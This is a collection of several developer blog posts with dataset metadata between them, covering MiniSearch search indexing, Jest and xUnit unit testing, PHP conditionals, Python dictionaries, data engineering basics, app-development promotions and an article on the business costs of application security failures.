Stopwords are common words such as `and`, `the`, `is`, etc., that hold little semantic value and can be safely excluded from search queries. By identifying and filtering out stopwords, the search engine can allocate more attention to meaningful keywords and ultimately improve the relevance of the search results. This is particularly important when aiming for precision in search queries.
```json
// List of stop words used
[ "a","able","about","across","after","almost","also","am","among","an","and","are","as","at","be","because","been","but","by","can","cannot","could","dear","did","does","either","ever","every","from","got","had","has","have","he","her","hers","him","his","how","however","i","if","into","it","its","just","least","like","likely","may","me","might","most","must","my","neither","no","nor","not","of","off","often","on","or","other","our","own","rather","said","say","says","she","should","since","so","some","than","that","the","their","them","then","there","these","they","this","tis","to","too","twas","us","wants","was","we","were","what","when","who","whom","why","will","would","yet","you","your" ]
```
### _Field Boosting: Spotlighting Priority Fields_
In scenarios where certain fields within a document hold higher importance, field boosting comes into play. This technique assigns higher relevance scores to specific fields, effectively prioritizing them in the search results. For instance, if you're searching for products, boosting the "product name" field might yield more accurate outcomes than boosting other less relevant fields.
```js
var index = lunr(function () {
this.ref("location");
// Boost score when title matches
this.field("title", { boost: 100 });
this.field("text");
documenterSearchIndex["docs"].forEach(function (e) {
this.add(e);
}, this);
});
```
### _Fuzzy Searching: Embracing Variability_
Fuzzy searching is an indispensable feature that accounts for slight variations and typos in search queries. Edit distance, a metric used to measure the similarity between two strings, is a fundamental component of fuzzy searching. When users inadvertently mistype a word or opt for a slightly different variant, fuzzy searching leverages edit distance to identify potential matches. This ensures that users aren't penalized for minor errors such as typos or when a cat walks over their keyboard and are still presented with relevant results.

## Transitioning to MinisearchJs
Well, the above might seem daunting but minisearch is very flexible and is extremely developer friendly. Below is the minisearch implementation.
```js
let index = new minisearch({
fields: ["title", "text"], // fields to index for full-text search
storeFields: ["location", "title", "text", "category", "page"], // fields to return with search results
processTerm: (term) => {
let word = stopWords.has(term) ? null : term;
if (word) {
// custom trimmer that doesn't strip @ and !, which are used in julia macro and function names
word = word
.replace(/^[^a-zA-Z0-9@!]+/, "")
.replace(/[^a-zA-Z0-9@!]+$/, "");
}
return word ?? null;
},
// add . as a separator, because otherwise "title": "Documenter.Anchors.add!", would not find anything if searching for "add!", only for the entire qualification
tokenize: (string) => string.split(/[\s\-\.]+/),
// options which will be applied during the search
searchOptions: {
boost: { title: 100 },
fuzzy: 2,
processTerm: (term) => {
let word = stopWords.has(term) ? null : term;
if (word) {
word = word
.replace(/^[^a-zA-Z0-9@!]+/, "")
.replace(/[^a-zA-Z0-9@!]+$/, "");
}
return word ?? null;
},
tokenize: (string) => string.split(/[\s\-\.]+/),
},
});
```
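Once the index is configured, using it is just a matter of adding the documents and querying. A minimal usage sketch (assuming, as MiniSearch requires by default, that each document carries an `id` field):

```js
// index the documents once at load time
index.addAll(documenterSearchIndex["docs"]);

// query; results come back ranked, with the stored fields attached
let results = index.search("add!");
results.slice(0, 5).forEach((result) => {
  console.log(result.score, result.title, result.location);
});
```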
### _Was the switch worth it?_
In one word, yes! It improved cold start times, but the main win was reducing the size of the index by **_16%_**.
### Implementation of Design Mockups and Static Build:
Leveraging insights from prior research on search UIs, I crafted interactive and user-friendly interfaces. These designs were aimed at enhancing the visual and functional aspects of the search modal. This involved ensuring seamless navigation, clean typography, and optimal placement of UI elements. What followed was the creation of a static build housing an impressive array of ten or more UI variations for the search modal. This diverse set of UIs allows for a comprehensive exploration of different visual and interactive possibilities.
If someone wants to test out the different options then head here, [Mock Search UIs](https://documenter-search.netlify.app/search-ui.html)

## ⚡An Unexpected Development:
With JuliaCon 2023 coming up, my mentor asked if I could improve the current search listing into something presentable. We quickly set up a meeting to discuss how to improve the listing in a way that was fast enough and didn't require much time. In the end, we decided to keep the listing as it is, because integrating a full-blown modal UI would require time and iterations based on feedback. Instead, we agreed to update the results using the new UI as a reference. And since I already had all the required data at hand coming from minisearch, it was just a matter of updating the DOM structure and some CSS magic🪄. I quickly put together the elements and this was the result.


## 📜Mid-Term Evals:
With the search engine changed and the mockups built, I was pretty much ready for the mid-term evaluation. This is an optional evaluation for both mentors and contributors, where each leaves feedback for the other and answers some basic questions. However, if a mentor fails you in the evals, you won't be able to continue. That fact had me feeling nervous, but since I was ahead of my tasks, I passed with flying colours.
## 📎Sharing My GSoC Proposal:
For those who are curious to delve deeper into the foundations of my GSoC project and explore the roadmap that led to all this, I invite you to take a look at my GSoC proposal. It outlines the initial concepts, goals, and strategies that have guided these weeks of progress. Feel free to explore the proposal here📝. Your interest in the journey is greatly appreciated, and I'm excited to share this transformative process with you.
---
If you're interested in following my progress or connecting with me, please feel free to reach out!
Github: [Hetarth02](https://github.com/Hetarth02)
LinkedIn: [Hetarth Shah](https://www.linkedin.com/in/hetarth-shah-1ab392220)
Website: [Portfolio](https://hetarth02.github.io/)
Thank you for joining me on this journey, and look forward to more updates as I continue to contribute to the Julia community during GSoC.
Credits:
Cover Image from [Minisearch Repo](https://github.com/lucaong/minisearch).
| hetarth02 |
1,662,983 | Unit Test | Jest I used Jest to add unit tests in my typescript project, which is straight-forward and... | 0 | 2023-11-10T14:57:17 | https://dev.to/seogjun/unit-test-4jmp | ### Jest
I used `Jest` to add unit tests to my TypeScript project. It is straightforward, and since I had worked with `Jest` before, it felt handy.
### What is Jest?
Jest is a JavaScript testing framework designed to ensure correctness of any JavaScript codebase.
### Jest with Typescript
#### Prerequisite
```bash
npm i -D jest typescript
```
#### Step1
```bash
npm i -D ts-jest @types/jest
```
#### Step2
```bash
npx ts-jest config:init
```
#### Step3
Create `{file_name}.test.ts` files for your unit tests and add the following scripts to `package.json`:
```
"test": "jest -c jest.config.ts --runInBand --",
"test:watch": "jest -c jest.config.ts --runInBand --watch --",
```
The `npm run test` command runs all unit test files such as `{file_name}.test.ts`, while `npm run test:watch` keeps re-running the tests and watching the results as you fix your code.
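As a quick illustration (a hypothetical `sum` module, not code from my project), a minimal TypeScript test looks like this:

```typescript
// sum.ts
export function sum(a: number, b: number): number {
  return a + b;
}

// sum.test.ts
import { sum } from "./sum";

describe("sum", () => {
  it("adds two numbers", () => {
    expect(sum(1, 2)).toBe(3);
  });
});
```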
Also, you can check coverage, which shows how much of your code your unit tests exercise. This is the script for checking coverage:
```
"coverage": "jest -c jest.config.ts --runInBand --coverage"
```
### Learning Opportunity
When I started my project, my priority was to implement the functionality and get the project running properly, so I didn't really think about edge cases and failure cases; I always assumed my app was working properly. This time, however, I found out I had missed a lot of error handling, so I added `try`/`catch` blocks, refactored my code, and improved the quality of my project. I also realized that unit testing is harder, and more important, than implementing the features: it takes real energy and effort to verify that a project works properly. I'll keep getting used to unit testing, and next time I'll implement an integration test with GitHub Actions | seogjun |
1,663,029 | Digital Empire: Mobile App Development in New York | Energize your business with cutting-edge app development services in New York's vibrant and dynamic... | 0 | 2023-11-10T15:56:59 | https://dev.to/martindye/digital-empire-mobile-app-development-in-new-york-7ed | Energize your business with cutting-edge [app development services in New York](https://www.technbrains.com/locations/mobile-app-development-new-york/)'s vibrant and dynamic landscape, tailored to redefine your digital presence.
**Reach Out To Us**
Email: contact@technbrains.com
Call: 833-888-8370
**Social Links**
Facebook
https://www.facebook.com/pages/category/Software-Company/Technbrains-100478948441594/
Twitter
https://twitter.com/technbrains
Instagram
https://www.instagram.com/technbrains/
LinkedIn
https://www.linkedin.com/company/technbrains
| martindye | |
1,663,404 | Unit Testing | This week, my focus in the development of Learn2Blog centred on implementing unit testing, a crucial... | 0 | 2023-11-11T01:21:11 | https://dev.to/yousefmajidi/unit-testing-1l1o | opensource, beginners, testing, dotnet | This week, my focus in the development of [Learn2Blog](https://github.com/Yousef-Majidi/Learn2Blog) centred on implementing unit testing, a crucial aspect of ensuring the reliability and stability of the project. In this blog post, I'll delve into the significance of unit testing and touch upon the broader concept of end-to-end testing.
### The Importance of Testing
Unit testing and end-to-end testing are essential practices in software development, contributing to the overall quality and robustness of a project. Unit testing involves testing individual components or functions in isolation, ensuring they produce the expected output. On the other hand, end-to-end testing validates the entire system's functionality, simulating real-world scenarios.
## xUnit.net
I opted to use xUnit.net, a testing framework recommended by [Microsoft's dotnet documentation](https://learn.microsoft.com/en-us/dotnet/core/testing/#testing-tools). xUnit.net is known for its simplicity and efficiency in writing and executing tests.
To integrate xUnit.net into your project, execute the following command:
```bash
dotnet add package xunit
```
For creating a testing project and class in Visual Studio (Code), consider adding the `xunit.runner.visualstudio` package, ensuring it's applied to the testing project, not the main one.
### Creating a Testing Project
A testing project is crucial for maintaining a clean separation between the main project and its tests. In xUnit.net, each class and its methods in the testing project correspond to the classes and functionalities being tested.
#### Importing Main Project
To import the main project into the testing project, modify the `TestingProject.csproj` file:
```xml
<ItemGroup>
<ProjectReference Include="Relative path to MainProject.csproj" />
</ItemGroup>
```
> Ensure the path is correctly specified.
#### Writing Tests
I organized my tests by creating separate test classes corresponding to classes in the main project. For instance, the main project class `CommandLineParser` has a corresponding test class named `CommandLineParserTests`.
Utilizing `ITestOutputHelper` allows printing messages for each test; we can use it in our test class like so:
```c#
public class CommandLineParserTests
{
private readonly ITestOutputHelper output;
public CommandLineParserTests(ITestOutputHelper output)
{
this.output = output;
}
// rest of the code...
}
```
Here is an example of one of the tests, which checks the outcome of running the app without any arguments:
```c#
[Fact]
public void TestNoArgumentReturnsNull()
{
this.output.WriteLine("Should return null when user passes no arguments");
var args = Array.Empty<string>();
CommandLineOptions? options = CommandLineParser.ParseCommandLineArgs(args);
Assert.Null(options);
}
```
In this code, the `[Fact]` attribute marks the method as a test. The test creates an empty array to pass as `args`, simulating a user passing no arguments through the CLI, and then asserts that `options` comes back as `null`.
### Using `[Theory]` in xUnit
xUnit.net's `[Theory]` attribute simplifies testing scenarios with different sets of input data.
```c#
[Theory]
[InlineData("-o")]
[InlineData("--output")]
public void TestOutputArgument(string arg)
{
this.output.WriteLine("Should return option with OutputPath == 'testOutput'");
string outputPath = "testOutput";
var args = new string[] { arg, outputPath, "input" };
CommandLineOptions? options = CommandLineParser.ParseCommandLineArgs(args);
Assert.Equal(outputPath, options?.OutputPath);
}
```
The `[Theory]` attribute allows running the same test with different input values. In this example, the test checks if the `CommandLineParser` correctly handles different forms of the output argument.
## Incomplete Tests
While I successfully implemented several tests, some scenarios proved challenging. For example, testing the `-c / --config` argument requires mocking the config file, a task I documented in [issue #18](https://github.com/Yousef-Majidi/Learn2Blog/issues/18). Moq, a common tool for this in C# projects, was attempted but not fully successful.
### Code Coverage
Code coverage is an essential metric indicating the percentage of code exercised by tests. Although I haven't yet implemented it in Learn2Blog, Microsoft provides a guide to generating code coverage reports for .NET projects [here](https://learn.microsoft.com/en-us/dotnet/core/testing/unit-testing-code-coverage?tabs=windows). The pursuit of 100% code coverage ensures a more comprehensive validation of code integrity.
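For reference, the approach in that guide boils down to referencing the `coverlet.collector` NuGet package (included by default when you scaffold a test project with `dotnet new xunit`) and running:

```bash
dotnet test --collect:"XPlat Code Coverage"
```

The run drops a Cobertura-format `coverage.cobertura.xml` file into a `TestResults` folder, which tools like ReportGenerator can turn into an HTML report.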
## End-to-End Testing
As of now, Learn2Blog lacks a dedicated end-to-end test. While core features have been extensively tested in unit tests, [issue #20](https://github.com/Yousef-Majidi/Learn2Blog/issues/20) has been created to address this gap.
End-to-end testing involves validating the entire application's workflow, ensuring all components work harmoniously. It complements unit testing by verifying the integration of various modules.
## Lessons Learned
Reflecting on the testing process, it became evident that certain design flaws and bugs surfaced during testing. This emphasizes the importance of early test development, enabling the identification and rectification of issues before they escalate.
Automated tests, both unit and end-to-end, play a pivotal role in uncovering hidden bugs. The experience also highlighted the need for modular code, making it easier to test and maintain.
A bug with a `StringWriter` instance that surfaced during testing underscores the value of running multiple tests consecutively, mimicking real-world usage scenarios.
After squashing all of the different commits into a single one, it was merged into the `main` branch. You can review all the changes in [8e8edac](https://github.com/Yousef-Majidi/Learn2Blog/commit/8e8edac789ab6b1ade79e217b1537f9e1b16d879).
## Conclusion
In conclusion, the journey of implementing unit testing in Learn2Blog has been enlightening, exposing both strengths and areas for improvement. Embracing automated testing from the early stages is key to building a resilient and reliable software application. As development progresses, addressing the identified issues and continually expanding test coverage will be a priority for ensuring the long-term integrity of the project. | yousefmajidi |
1,663,482 | Implementing a Testing Framework | This week I managed to add a testing framework to my open source project, TILerator. Since it's a... | 0 | 2023-11-11T03:04:38 | https://dev.to/mismathh/implementing-a-testing-framework-2m0p | beginners, opensource, javascript, testing | This week I managed to add a testing framework to my open source project, [TILerator](https://github.com/mismathh/TILerator). Since it's a JavaScript project, I decided to use [Jest](https://jestjs.io/) as my testing framework.
<h2>What is Jest?</h2>
Jest is a JavaScript testing framework developed by Facebook and widely used for testing JavaScript and React applications. I had been exposed to Jest in other projects, and with its detailed [documentation](https://jestjs.io/docs/getting-started), it is quite easy to install.
<h3>Setting up Jest</h3>
Jest is needed only for testing purposes so install it as a dev dependency.
```JavaScript
npm install --save-dev jest
```
Next, add a test script to your `package.json` file to be able to run tests using Jest.
```Json
"scripts": {
"test": "jest --",
"test:watch": "jest --watch --"
}
```
Finally, create a testing directory to hold all of your tests.
<h2>Writing Tests</h2>
For my first test, I decided to test a function that receives a string and checks whether a certain `regex` pattern matches; if it does, the matched text is wrapped in HTML `<b></b>` tags. I wrote 5 tests to check the function's behaviour with various inputs.
```JavaScript
describe('markdownToHTML tests', () => {
    test('should return a string with <b> tags if part of string is encompassed between **', () => {
        expect(markdownToHTML('**sentence 1** sentence 2 **sentence 3**')).toBe('<b>sentence 1</b> sentence 2 <b>sentence 3</b>');
    });
    // ...four more tests covering other inputs
});
```
In order to test out the core functionality of the program, I also wrote 3 tests to confirm if the correct output would be returned. There was one hiccup when writing these tests, as within the core functions, I used `process.exit()` to exit the program on certain conditions, and if it is called within a Jest test, it will immediately stop the test runner which could lead to incomplete test results.
After reading the documentation to combat this, I found out about `mock functions` and `spyOn()`. Using mock functions and `mockImplementation()`, we can define the default implementation of a mock function, and the `spyOn()` function can be used to monitor the behaviour of the function. Combining these made it possible to monitor `process.exit()` and check the exit code that was output, without actually exiting the process.
```JavaScript
test("should exit with exit code -1 and error message if invalid file path is given", async () => {
  const mockStdErr = jest.spyOn(console, "error").mockImplementation();
  const mockExit = jest.spyOn(process, "exit").mockImplementation();

  // ...run the function under test with an invalid file path, then e.g.:
  // expect(mockExit).toHaveBeenCalledWith(-1);
  mockStdErr.mockRestore();
  mockExit.mockRestore();
});
```
The testing commit can be found here: [fc128e0](https://github.com/mismathh/TILerator/commit/fc128e073795b80cf1ce7474c14c60aaedb530f2)
<h2>Learning Outcomes</h2>
Despite having worked with Jest before in other JavaScript projects, there was still a lot to learn about its capabilities. Additionally, writing all those tests improved my understanding of TILerator. Testing should be a fundamental part of your project, not only to identify bugs but also to create reliable software. If you have a JavaScript project that needs a testing framework, try out Jest! | mismathh |
1,663,563 | Python - Use Hash Tables (Dictionaries) for Fast Data Retrieval | Hash tables, often implemented as dictionaries in Python, are a fundamental data structure for... | 0 | 2023-11-24T15:30:00 | https://dev.to/theramoliya/python-use-hash-tables-dictionaries-for-fast-data-retrieval-1oom | python, programming, beginners, tutorial | Hash tables, often implemented as dictionaries in Python, are a fundamental data structure for efficiently storing and retrieving data. They provide constant-time average-case lookup, insertion, and deletion operations, making them valuable for various applications. Here's an example:
```python
def count_elements(arr):
element_count = {} # Create an empty dictionary to store counts
for element in arr:
if element in element_count:
element_count[element] += 1 # Increment count if element exists
else:
element_count[element] = 1 # Initialize count if element is new
return element_count
# Example usage:
my_list = [1, 2, 2, 3, 3, 3, 4, 4, 4, 4]
result = count_elements(my_list)
print(result) # Output: {1: 1, 2: 2, 3: 3, 4: 4}
```
In this example, we use a dictionary (`element_count`) to efficiently count the occurrences of elements in a list. We iterate through the list, checking whether each element exists in the dictionary. If it does, we increment its count; otherwise, we initialize it with a count of 1. This approach provides a straightforward and efficient way to compute element frequencies.
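As a side note, Python's standard library already packages this exact pattern: `collections.Counter` builds the same hash-table-backed frequency dictionary in one line.

```python
from collections import Counter

print(Counter([1, 2, 2, 3, 3, 3, 4, 4, 4, 4]))
# Counter({4: 4, 3: 3, 2: 2, 1: 1})
```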
Hash tables are versatile and can be applied to various problems, such as caching, frequency counting, memoization, and more. Leveraging Python dictionaries effectively can lead to clean and performant solutions in many scenarios. | theramoliya |
1,663,802 | Data Engineering for Beginners: A Step-by-Step Guide | Introduction The data age has come with challenges that require innovations and the... | 0 | 2023-11-11T12:39:25 | https://dev.to/allan_ouko/data-engineering-for-beginners-a-step-by-step-guide-1o9p | ## Introduction
The data age has brought challenges that demand innovation and the evolution of existing technology to handle huge amounts of data. Data from various sources also requires faster processing to make it available for different use cases. Therefore, data engineering has become part of the ecosystem in many organizations, especially those handling large volumes of streaming data. It is now common to find organizations setting up a team of data engineers to ensure they properly capture the data as it streams in for the different use cases.
## What is Data Engineering?
Data engineering refers to designing, building, and maintaining the data infrastructure required to collect, store, process, and analyze large volumes of data. This data usually comes from various sources and lands in a centralized warehouse, where it is processed and stored for use by the different data teams. A data engineer, then, is a professional tasked with carrying out the data engineering process to ensure data quality and availability.
## Roles and Responsibilities of Data Engineers
Below are some of the core responsibilities handled by data engineers;
1. Designing and deploying data pipelines to extract, transform, and load (ETL) data from various sources.
2. Managing data warehouses and data lakes that store huge volumes of data, and scaling them to perform optimally.
3. Database design and data modeling handle different data types ingested in the data warehouse.
4. Collaboration with analytics team members, such as data scientists, to ensure efficient data collection, proper data quality checks, and data analytics.
5. Monitoring and maintaining the built data pipelines to ensure accuracy and consistency in data processing and ingestion.
## Skills for Data Engineer
Aspiring data engineers need the following skills to become proficient in the process.
**1. Programming languages (Python and SQL):** Python is necessary for writing code to automate workflows. SQL is also important for querying data from databases.
**2. Databases:** Database knowledge is important for understanding the different types, such as structured and NoSQL databases. A data engineer should know when to implement the use of each type with the necessary tools.
**3. Data warehousing:** Data warehousing is necessary to build databases for handling large data. This knowledge should also include learning Amazon Redshift and Google BigQuery to handle large warehouse data.
**4. ETL processes:** Learning the extract, load, and transform process helps determine how to fetch data from the different sources and prepare for different use cases.
**5. Big data frameworks:** A data engineer should also learn to manage big data using frameworks such as Apache Spark and Apache Hadoop.
**6. Data pipeline orchestration:** Data pipeline orchestration is necessary with tools such as Apache Airflow to manage the workflow. This process ensures data will move through different stages smoothly to the required database.
**7. Data modeling and design:** A data engineer should learn data modeling and design to know how the different data relate to each other and where and how to store the information.
**8. Streaming data:** Data engineers also need tools like Apache Kafka for real-time data streaming.
**9. Infrastructure and cloud services:** Learn platforms like AWS, Microsoft Azure, and GCP, which let you manage and store data on cloud infrastructure without running your own servers.
**10. Data quality and governance:** It is also important for data engineers to ensure data is accurate and reliable by implementing the best data quality practices. Besides, implementing data security ensures data is protected from security breaches.
## Summary
Data engineering is vital for most organizations that deal with big data and require automation and consistency in data collection, preparation, and analysis. There is also an increasing demand for data engineers, and data availability pushes most of these organizations to set up the infrastructure to handle the information. Thus, aspiring data engineers need to understand the basics of data engineering to build reliable data pipelines.
| allan_ouko | |
1,663,813 | EP 5 - Conditionals and Booleans | So interesting lesson where we touch again on string interpolation and introduce booleans and... | 0 | 2023-11-11T13:18:28 | https://dev.to/kostanovak/ep-5-conditionals-and-booleans-488 | interpolation, conditionals, php | So interesting lesson where we touch again on string interpolation and introduce booleans and conditionals.
I solved the task myself first by including the conditional logic inside the h1 tag, like this:
```PHP
<body>
<?php
$name = "Dark Matter";
$read = true;
?>
<h1>
<?php
if ($read){
echo "You have read $name";
}else {
echo "You have NOT read $name";
}
?>
</h1>
</body>
```
Jeffrey did it afterwards in a more effective way, I think, by separating the conditional logic into the first PHP tag before the h1 and by introducing a `$message` variable, like this:
```PHP
<body>
<?php
$name = "Dark Matter";
$read = false;
if ($read){
$message = "You have read $name";
}else {
$message = "You have NOT read $name";
}
?>
<h1>
<?php
echo $message;
?>
</h1>
</body>
```
So basically we are only echoing our variable inside the h1 tag and keeping the conditional logic in a separate PHP tag. A more elegant solution, I guess.
| kostanovak |
1,663,852 | Making Utility App Development a Breeze with Tech Experts | In today's digital world, finding a friend who can simplify Utility App Development is like striking... | 0 | 2023-11-11T14:33:50 | https://dev.to/asadbashir/making-utility-app-development-a-breeze-with-tech-experts-53n | In today's digital world, finding a friend who can simplify Utility App Development is like striking gold. Lucky for you, we have the wizards of simplicity, your go-to Tech Experts. Let's take a walk through their easy solutions, making Utility App Development a walk in the park.
## Tech Experts Unveiled: Simplifying Utility App Development
Tech Experts, your friendly wizards in the tech realm, are here to simplify the sometimes tricky world of Utility App Development. Step into the realm where [Tech Experts](https://techxpert.io/) work their magic, creating solutions that are not just powerful but also incredibly easy to use.
## Your Utility Ally: How Tech Experts Master Utility App Development
Right here in your digital neighborhood, Tech Experts emerge as your trusted Utility App Development buddies. They don't just create apps; they build companions that understand your utility needs. Tech Experts become your ally, ensuring every app they craft is effortlessly useful for you.
### Unleashing Tech Wonders: Tech Experts as Your Local Utility Gurus
Tech Experts, your local tech gurus, are on a mission to unleash the wonders of technology for you. Explore the simplicity of Utility App Development and let Tech Experts guide you through the world of effortless utility solutions.
### Making Tech Easy: Tech Experts' Approach to Utility App Development
In the heart of your digital hub, Tech Experts are changing the game by making technology easy. Utility App Development becomes straightforward and accessible under their expert care. Tech Experts' approach is not just about apps; it's about simplifying your utility experience.
### Your Utility App Partner: Tech Experts' Easy Solutions
When it comes to Utility App Development, Tech Experts aren't just developers; they are your partners. Every app they create is designed to be easy, ensuring that you don't need a tech manual to navigate through the utility landscape.
### The Tech Experts Difference: Utility Apps, Made Easy for You
What sets Tech Experts apart is their commitment to making Utility App Development easy for everyone. In your digital hub, they are not just developers; they are your guides in the world of hassle-free utility technology.
Now, let's explore why having a Utility App Development partner like Tech Experts is a game-changer for you.
Living in a world where things move fast, having a local Utility App Development partner simplifies your utility needs. Tech Experts understand the pulse of the community and tailor their solutions to meet your specific utility requirements.
Whether you're a business owner or an individual seeking an easy-to-use Utility App, Tech Experts have got you covered. They prioritize simplicity without sacrificing functionality, ensuring that your utility experience is smooth and enjoyable.
Tech Experts' approach goes beyond just being a Utility App Development provider; they aim to be your utility ally. In your digital neighborhood, having a partner who speaks your language and makes utility tech easy is invaluable. Tech Experts bridge the gap between complex utility technology and everyday users, offering a refreshing take on Utility App Development. | asadbashir | |
1,663,858 | AppSec and DevSecOps: part 1 - metrics, statistics, challenges, state of the industry | Intro We often hear that cybersecurity in companies with low maturity is... | 0 | 2023-11-11T15:59:59 | https://dev.to/d3one/appsec-and-devsecops-part-1-metrics-statistics-challenges-state-of-the-industry-3fg3 | security | # **Intro**
We often hear that cybersecurity in companies with low maturity is expensive, which raises questions about what benefits it brings to the business. Why does a development team need AppSec/DevSecOps specialists? Why is fixing a code defect at the design level cheaper than at the development stage, and far cheaper still at the release and production stages? And how can Shift Left save a company money in the long term?
In the material below, we will consider the relevance of the issue, evaluate how investing in AppSec/DevSecOps contributes to a high-quality final product, analyze some metrics, look at the criteria for assessing the effectiveness of AppSec/DevSecOps processes and, finally, draw a conclusion: who needs AppSec/DevSecOps, and when.

# [General statistics]
**Let's take a look at some stats:**
- Recent studies show a 210% increase in new vulnerabilities per year in the National Vulnerability Database (NVD)
- 92% of developers feel pressure to release code to market faster
- The top 50 US university coding programs currently don't require their students to take secure coding courses
Let's consider that almost [95% of data breaches](https://www.verizon.com/business/resources/reports/dbir/) last year were on web apps, and 56% of the biggest incidents in the last 5 years tie back to web app security issues. It often takes more than eight months to find a web app exploit, which means that your business and your customers can be exposed to attackers for an extended period of time.
**Attacks on web apps have cost over $7.6 billion, representing 42% of all financial losses from attacks.**
## What are the difficulties?
**Cost to Remediate Vulnerabilities**
When your team learns of a vulnerability, you need to act quickly to remediate the problem, because until it's fixed your application is a sitting duck.
Studies show that the average time to detect, prioritize, and remediate one vulnerability is 7 hours.
**Let's look at the calculations:**
- A team is faced with **5,000 vulnerabilities**
- They fix at least 30% of the vulnerabilities = **1,500 vulnerabilities to fix**
- 1,500 vulnerabilities @ 7 hours each = **10,500 hours of developer work**
- 10,500 hours of developer work @ $72/hour\* = **$757,215**
**The total average cost to remediate vulnerabilities is $757,215 annually.**
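The arithmetic is easy to check; here is the same estimate as a small Python sketch (note the article's published total implies an unrounded hourly rate of about $72.12, so the rounded rate below lands slightly lower):
```python
vulns_found = 5_000
fix_share = 0.30           # the team fixes ~30% of findings
hours_per_fix = 7          # detect + prioritize + remediate
hourly_rate = 72           # rounded developer cost per hour

fixes = vulns_found * fix_share      # 1,500 vulnerabilities
hours = fixes * hours_per_fix        # 10,500 developer hours
annual_cost = hours * hourly_rate    # $756,000 at the rounded rate

print(f"{fixes:,.0f} fixes, {hours:,.0f} hours, ${annual_cost:,.0f}/year")
```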
Let's look at the obvious bills first: the downtime and PR agony of a big, public software failure. Here are a few recent cautionary tales that illustrate the impact of a catastrophic failure or breach.
- The [big Facebook outage](https://en.wikipedia.org/wiki/2021_Facebook_outage) in 2021 was reported to cost [$65 million](https://www.forbes.com/sites/abrambrown/2021/10/05/facebook-outage-lost-revenue/) in advertising revenue, and (temporarily) tanked Mark Zuckerberg's personal wealth to the tune of $6 billion.
- Twitter has famously suffered an [ongoing series of outages](https://edition.cnn.com/2023/03/12/tech/twitter-breaking/index.html) since Elon Musk's extensive layoffs, during which period the stock price also [plummeted to a third of its former value](https://www.theguardian.com/technology/2023/may/31/twitters-value-down-two-thirds-since-musk-takeover-says-investor).
- The [infamous SolarWinds attack](https://www.cybersecuritydive.com/news/solarwinds-1-year-later-cyber-attack-orion/610990/) cost **18,000 clients** an average of $12 million each. Impacted companies in the U.S. reported an average of a 14% impact on their annual revenue. SolarWinds itself had $40 million in upfront recovery costs, plus their stock plummeted from $25/share in 2020 to about $9.
- In September 2022, hackers stole **$160 million** from crypto platform Wintermute. In [March 2022](https://www.bleepingcomputer.com/news/security/hackers-stole-620-million-from-axie-infinity-via-fake-job-interviews/), hackers stole **$620 million in Ethereum** cryptocurrency from play-to-earn game Axie Infinity. In [June 2023](https://www.bleepingcomputer.com/news/security/atomic-wallet-hacks-lead-to-over-35-million-in-crypto-stolen/), hackers stole $35 million in crypto from Atomic Wallet.
While crypto is clearly a major target, it's far from the only one. According to Cybersecurity Ventures, cybercrime costs alone will reach [**$10.5 trillion annually**](https://www.embroker.com/blog/cyber-attack-statistics/#:~:text=of%20Cyber%20Attacks-,Costs%20of%20Cybercrime,of%20economic%20wealth%20in%20history.) by 2025, and the US will shoulder at least one-third of that cost.
## Additional Risk: Software errors and loss of investor trust
[Boeing's Starliner has suffered from problems](https://www.nytimes.com/2020/02/07/science/boeing-starliner-nasa.html) related to software errors since 2018, with two failed attempts to launch. Boeing has reported losses totaling $595 million related to the project, and their stock price has suffered significantly.
Investors made their displeasure known when [Slack outages showed up](https://www.cnbc.com/2019/09/05/slack-says-in-q2-earnings-that-outage-costs-were-one-time-issue.html) in their quarterly earnings, as they'd failed to meet the standards set out in their SLAs. The market responded with a chilly 14% drop in the stock valuation.
[British Airways wiped about $200M off their stock price](https://www.theguardian.com/business/2017/may/30/british-airways-ba-owner-drops-value-it-meltdown) when they stranded hundreds of passengers in airports during a major systems outage.
And to cite [just one of many](https://www.investors.com/news/tesla-stock-falls-after-362000-vehicle-recall-for-full-self-driving-flaws/) Tesla reliability headlines, Tesla stock fell 5.7% after announcing a major patch to 362,000 of their self-driving vehicles. The company's self-driving software has been plagued with widespread issues for years, which have regularly chipped away at the stock price.
## [Software Bugs Examples]

### Government sector
You might think that in spacecraft engineering, there's a lot that could go wrong. Yes, that's right. Moreover, NASA has had several failures because of bugs. On July 22, 1962, their Mariner 1 probe heading toward Venus was destroyed just 293 seconds after launch. Why did it happen? Engineers missed a hyphen in the code. Because of this, the spacecraft was **"wrecked by the most expensive hyphen in history."** The cost of the program failure was $18.5 million in 1962. Today the cost of such a mistake would be approximately **$554 million.**
Did they learn the lesson and start testing better? Not so fast. In 1999, NASA's Mars Climate Orbiter got lost in space after a 286-day journey from Earth. The spacecraft orbited too close to Mars' surface and disintegrated. The reason was that one engineering team used English units of measurement (inches, feet, and pounds) while the other used the more conventional metric system (millimeters, meters, and kilograms) for key operations. At the end of the project, the two teams forgot to convert between the systems. The cost of this bug in code: **$125 million.**
One more punch for NASA was the Genesis crash in 2004. It was meant to bring back space material from beyond Earth's moon. Genesis returned to Earth three years after takeoff with samples of the solar wind for analysis. But it didn't land smoothly. It crashed in Utah. As a result, many of the probe's precious samples were destroyed and polluted, though some were recovered. A NASA report released in 2009 said that Lockheed Martin workers had inverted the position of the probe's accelerometers. Hence, the spacecraft never knew it was decelerating into the Earth's atmosphere and, therefore, never deployed its parachute. This gap in testing cost NASA **over $260 million.**
### Commercial sector
#### PayPal

One of the largest online payment platforms in the world, PayPal, has also faced a lot of trouble because of software defects. One beautiful morning, Chris Reynolds from Pennsylvania became **$92 quadrillion** richer thanks to a small PayPal error: they accidentally credited this amount of money to his account. What a surprise it was for Chris when he checked his monthly statement. But the error was quickly recognized and fixed. By the time Chris Reynolds had logged in, his account had returned to zero.
One more severe PayPal security bug, known since 2021, **isn't fixed to this day.** This unpatched bug lets hackers steal money from PayPal users. With the help of this defect, attackers can trick victims into unknowingly completing attacker-directed transactions with a single click.
#### Knight

What if some computer bug made you buy high and sell low? What if such a bug cost you **$440 million**? Unreal? That's exactly what happened to Knight, and it nearly bankrupted them.
In 2012 Knight was the largest trader in the U.S., with average daily trading of over $21 billion. One August morning that year, Knight activated new trading software… with a bug. When the New York Stock Exchange opened that day, the faulty software sent Knight on an acquisition spree. Soon it was buying shares in about 150 companies, worth about **$7 billion in the first hour.**
According to stock exchange rules, Knight had to pay for those shares three days later, but they couldn't, as they had no source of funds behind them. Of course, Knight tried to cancel the trades, but the chairman of the Securities and Exchange Commission, Mary Schapiro, refused. Only six stock transactions were reversed.
